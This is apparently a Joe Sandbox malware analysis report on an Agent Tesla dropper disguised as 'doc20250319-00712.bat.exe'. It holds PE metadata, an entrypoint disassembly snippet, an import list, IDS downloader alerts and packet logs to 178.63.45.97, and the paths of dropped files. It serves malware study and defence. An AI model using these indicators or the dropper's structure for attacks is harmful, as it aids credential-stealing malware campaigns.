Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x536FD79E [Sun May 11 20:03:42 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e160ef8e55bb9d162da4e266afd9eef3

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409190h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407034h]
push 00008001h
call dword ptr [0040711Ch]
push ebx
call dword ptr [0040728Ch]
push 00000008h
mov dword ptr [0042E458h], eax
call 00007FD284B7542Ah
mov dword ptr [0042E3A4h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 004287E0h
call dword ptr [00407164h]
push 00409180h
push 0042DBA0h
call 00007FD284B750D4h
call dword ptr [00407120h]
mov ebp, 00434000h
push eax
push ebp
call 00007FD284B750C2h
push ebx
call dword ptr [00407118h]
cmp byte ptr [00434000h], 00000022h
mov dword ptr [0042E3A0h], eax
mov eax, ebp
jne 00007FD284B7269Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00434001h
push dword ptr [esp+14h]
push eax
call 00007FD284B74B52h
push eax
call dword ptr [00407220h]
mov dword ptr [esp+1Ch], eax
jmp 00007FD284B72755h
cmp cl, 00000020h
jne 00007FD284B72698h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FD284B7268Ch

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x74b0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3f000	0x23330	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5de0	0x5e00	fb829372ec3ee0af33f0926f363d7112	False	0.6797290558510638	data	6.509050369718118	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x12da	0x1400	bed60c9116dbff6d06b51530a732c0c9	False	0.4392578125	data	5.100506048006475	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x25498	0x400	fc40238f44ce66a60a99356986da33b0	False	0.6416015625	data	5.041552728077907	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2f000	0x10000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3f000	0x23330	0x23400	b62d6462cc12a8388f786626af39d99c	False	0.33869403812056736	DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8192.000000	4.734713053879498	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3f2f8	0x10900	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.2779333726415094
RT_ICON	0x4fbf8	0x9500	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	English	United States	0.3442743288590604
RT_ICON	0x590f8	0x4300	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States	0.40747434701492535
RT_ICON	0x5d3f8	0x2600	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.46319901315789475
RT_ICON	0x5f9f8	0x1100	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.5491727941176471
RT_ICON	0x60af8	0xa00	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	English	United States	0.59296875
RT_ICON	0x614f8	0x500	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.621875
RT_DIALOG	0x619f8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x61af8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x61c18	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x61c78	0x68	data	English	United States	0.6826923076923077
RT_VERSION	0x61ce0	0x344	data	English	United States	0.5167464114832536
RT_MANIFEST	0x62028	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
USER32.dll	CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Version Infos

Description	Data
Comments	recommendatory
CompanyName	hjlpevirksomhederne slmninger ordrenavn
FileDescription	sudder flsk
FileVersion	3.5.0.0
LegalCopyright	korrektes polonick akrteria
LegalTrademarks	agnostics
OriginalFilename	missyllabification.exe
ProductName	barbermaskiners pieshop beeware
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-19T16:45:38.904682+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.10	49695	178.63.45.97	443	TCP
2025-03-19T16:45:41.040506+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.10	49696	178.63.45.97	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 19, 2025 16:45:37.397356987 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:37.397402048 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:37.397480011 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:37.414172888 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:37.414189100 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:38.518234015 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:38.518301964 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:38.586170912 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:38.586210966 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:38.586616993 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:38.586685896 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:38.588823080 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:38.632325888 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:38.904692888 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:38.904719114 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:38.904767036 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:38.904788017 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:38.904809952 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:38.904861927 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:38.978591919 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:38.978688002 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.059622049 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.059792995 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.061222076 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.061317921 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.062166929 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.062247992 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.133718967 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.133832932 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.215603113 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.215883970 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.216021061 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.216116905 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.217000961 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.217104912 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.217999935 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.218110085 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.218843937 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.218943119 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.219702959 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.219795942 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.288773060 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.288983107 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.289345980 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.289436102 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.330065966 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.330142021 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.369570971 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.369652033 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.370367050 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.370430946 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.371293068 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.371359110 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.372013092 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.372080088 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.372870922 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.372951984 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.373886108 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.373963118 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.374821901 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.374876976 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.375716925 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.375776052 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.376594067 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.376657963 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.377497911 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.377557993 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.526294947 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.526382923 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.526493073 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.526552916 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.526705980 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.526761055 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.526947021 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.527009964 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.527153015 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.527213097 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.527357101 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.527405024 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.527407885 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.527453899 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.529134035 CET	49695	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.529160976 CET	443	49695	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.649470091 CET	49696	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.649529934 CET	443	49696	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:39.649667025 CET	49696	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.649996996 CET	49696	443	192.168.2.10	178.63.45.97
Mar 19, 2025 16:45:39.650015116 CET	443	49696	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:40.722722054 CET	443	49696	178.63.45.97	192.168.2.10
Mar 19, 2025 16:45:40.722887039 CET	49696	443	192.168.2.10	178.63.45.97

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report doc20250319-00712.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\lanser.lnk

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Afhndernes.jpg

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Fisketure\Engagements.txt

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Fisketure\Regulatorens.uzb

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Fisketure\barbuts.jpg

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Fisketure\blastocoelic.udh

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Fisketure\bracteole.jpg

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Konflikters\divorced.ini

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\doc20250319-00712.bat.exe

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\doc20250319-00712.bat.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\rygtes.bor

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\stallenger.txt

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\Flusher108\vandlbsloven.ini

C:\Users\user\AppData\Local\Temp\Reguardant30\taoist\Massen\Hypothetic\Coppersmiths\husmdrenes.jpg

Windows Analysis Report
doc20250319-00712.bat.exe